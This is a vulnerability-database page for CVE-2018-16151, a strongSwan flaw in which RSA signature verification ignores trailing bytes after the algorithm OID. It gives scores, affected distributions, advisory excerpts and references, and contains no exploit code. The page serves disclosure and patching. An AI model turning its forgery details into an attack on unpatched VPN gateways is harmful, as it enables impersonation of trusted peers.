Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.5
CVSSv3

CVE-2018-16151

Published: 26/09/2018 Updated: 07/11/2023
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9
VMScore: 445
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
Subscribe to Strongswan

Vulnerability Summary

In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x prior to 5.7.0, the RSA implementation based on GMP does not reject excess data after the encoded algorithm OID during PKCS#1 v1.5 signature verification. Similar to the flaw in the same version of strongSwan regarding digestAlgorithm.parameters, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation when only an RSA signature is used for IKEv2 authentication.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

strongswan strongswan

debian debian linux 8.0

debian debian linux 9.0

canonical ubuntu linux 16.04

canonical ubuntu linux 14.04

canonical ubuntu linux 18.04

Vendor Advisories

Ubuntu Security Notice: strongswan vulnerabilities
Several security issues were fixed in strongSwan ...
Debian Security Advisories: DSA-4305-1 strongswan -- security update
Sze Yiu Chau and his team from Purdue University and The University of Iowa found several issues in the gmp plugin for strongSwan, an IKE/IPsec suite Problems in the parsing and verification of RSA signatures could lead to a Bleichenbacher-style low-exponent signature forgery in certificates and during IKE authentication While the gmp plugin does ...
Debian Security Advisories: DSA-4309-1 strongswan -- security update
Google's OSS-Fuzz revealed an exploitable bug in the gmp plugin caused by the patch that fixes CVE-2018-16151 and CVE-2018-16152 (DSA-4305-1) An attacker could trigger it using crafted certificates with RSA keys with very small moduli Verifying signatures with such keys would cause an integer underflow and subsequent heap buffer overflow resultin ...
Red Hat: CVE-2018-16151
In verify_emsa_pkcs1_signature() in gmp_rsa_public_keyc in the gmp plugin in strongSwan 4x and 5x before 570, the RSA implementation based on GMP does not reject excess data after the encoded algorithm OID during PKCS#1 v15 signature verification Similar to the flaw in the same version of strongSwan regarding digestAlgorithmparameters, a re ...
Arch Linux Issues:
The OID parser allows any number of random bytes after a valid OID for a PKCS#15 signature The asn1_known_oid() function just parses until it finds a leaf in the tree of known OIDs, any further data that follows is simply ignored And the function that parses ASN1 algorithmIdentifier structures doesn't care if the full OID data was parsed as it ...

References

CWE-347https://www.debian.org/security/2018/dsa-4305https://usn.ubuntu.com/3771-1/https://lists.debian.org/debian-lts-announce/2018/09/msg00032.htmlhttps://security.gentoo.org/glsa/201811-16http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00077.htmlhttp://lists.opensuse.org/opensuse-security-announce/2019-12/msg00001.htmlhttp://lists.opensuse.org/opensuse-security-announce/2020-03/msg00047.htmlhttps://www.strongswan.org/blog/2018/09/24/strongswan-vulnerability-%28cve-2018-16151%2C-cve-2018-16152%29.htmlhttps://usn.ubuntu.com/3771-1/https://nvd.nist.gov
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-34377CVE-2024-20859CVE-2023-49606injectarbitrary CVE-2024-33788CVE-2024-30973IDORCVE-2024-33907
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook